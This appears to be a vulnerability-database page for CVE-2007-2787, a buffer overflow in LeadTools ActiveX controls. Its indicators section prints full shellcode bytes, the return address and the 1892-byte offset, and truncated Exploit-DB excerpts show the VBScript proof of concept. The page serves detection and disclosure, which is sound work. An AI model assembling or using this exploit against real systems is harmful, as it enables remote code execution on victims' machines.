CVE-2007-2787
published 2007-05-21CVE-2007-2787: Stack-based buffer overflow in the BrowseDir function in the (1) lttmb14E.ocx or (2) LTRTM14e.DLL ActiveX control in LeadTools Raster Thumbnail Object Library…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.50%
93.7th percentile
Stack-based buffer overflow in the BrowseDir function in the (1) lttmb14E.ocx or (2) LTRTM14e.DLL ActiveX control in LeadTools Raster Thumbnail Object Library 14.5.0.44 allows remote attackers to execute arbitrary code via a long argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lead_technologies | leadtools_raster_thumbnail_object_library | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%EB%AA%3F%7E
bytes↗
%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a
- →The vulnerable method is BrowseDir on the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL; monitor for invocation of BrowseDir with arguments exceeding 1892 bytes, which triggers the stack-based buffer overflow. ↗
- →The exploit uses a 1892-byte 'A' padding buffer followed by the EIP overwrite value %EB%AA%3F%7E (call ESP gadget from user32.dll); detect large string arguments to BrowseDir in browser/script contexts. ↗
- →The exploit is delivered via a VBScript Sub invoking the ActiveX BrowseDir method with a crafted oversized egg string; look for script blocks calling .BrowseDir with large string concatenations in HTML/HTA files. ↗
- →The exploit targets Windows XP SP2 with Internet Explorer 7; the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL should be flagged as kill-bit candidates and their presence on systems audited. ↗
- ·The EIP overwrite gadget (%EB%AA%3F%7E, 'call ESP') is sourced from user32.dll and is version/OS-specific; the offset of 1892 bytes and this gadget address apply specifically to Windows XP SP2 with the tested DLL version 14.5.0.44. ↗
- ·Both exploits (lttmb14E.ocx and LTRTM14e.DLL) use identical shellcode and buffer layout, indicating the same vulnerability surface and offset apply to both ActiveX controls at version 14.5.0.44. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow
---
2007/05/20
LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
This exploits just open calc.exe
Sub tryMe
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%
Exploit-DB
LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
exploitdb·2007-05-18
CVE-2007-2787 LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow
---
2007/05/19
LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
url: http://www.leadtools.com/
peice: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
This exploits just open calc.exe
Sub tryMe()
buff = String(1892, "A")
get_EIP = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)
buff2 = String(40, "A")
nop = String(16, unescape("%90"))
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%3
No writeups or analysis indexed.
http://moaxb.blogspot.com/2007/05/moaxb-19-leadtools-thumbnail-browser.htmlhttp://moaxb.blogspot.com/2007/05/moaxb-20-leadtools-raster-thumbnail.htmlhttp://osvdb.org/36028http://osvdb.org/36029http://secunia.com/advisories/25331http://secunia.com/advisories/25376http://www.securityfocus.com/bid/24053http://www.securityfocus.com/bid/24057http://www.shinnai.altervista.org/moaxb/20070519/lademthumbtxt.htmlhttp://www.shinnai.altervista.org/moaxb/20070520/leadrastertxt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34378https://exchange.xforce.ibmcloud.com/vulnerabilities/34379https://www.exploit-db.com/exploits/3951https://www.exploit-db.com/exploits/3952http://moaxb.blogspot.com/2007/05/moaxb-19-leadtools-thumbnail-browser.htmlhttp://moaxb.blogspot.com/2007/05/moaxb-20-leadtools-raster-thumbnail.htmlhttp://osvdb.org/36028http://osvdb.org/36029http://secunia.com/advisories/25331http://secunia.com/advisories/25376http://www.securityfocus.com/bid/24053http://www.securityfocus.com/bid/24057http://www.shinnai.altervista.org/moaxb/20070519/lademthumbtxt.htmlhttp://www.shinnai.altervista.org/moaxb/20070520/leadrastertxt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34378https://exchange.xforce.ibmcloud.com/vulnerabilities/34379https://www.exploit-db.com/exploits/3951https://www.exploit-db.com/exploits/3952
2007-05-21
Published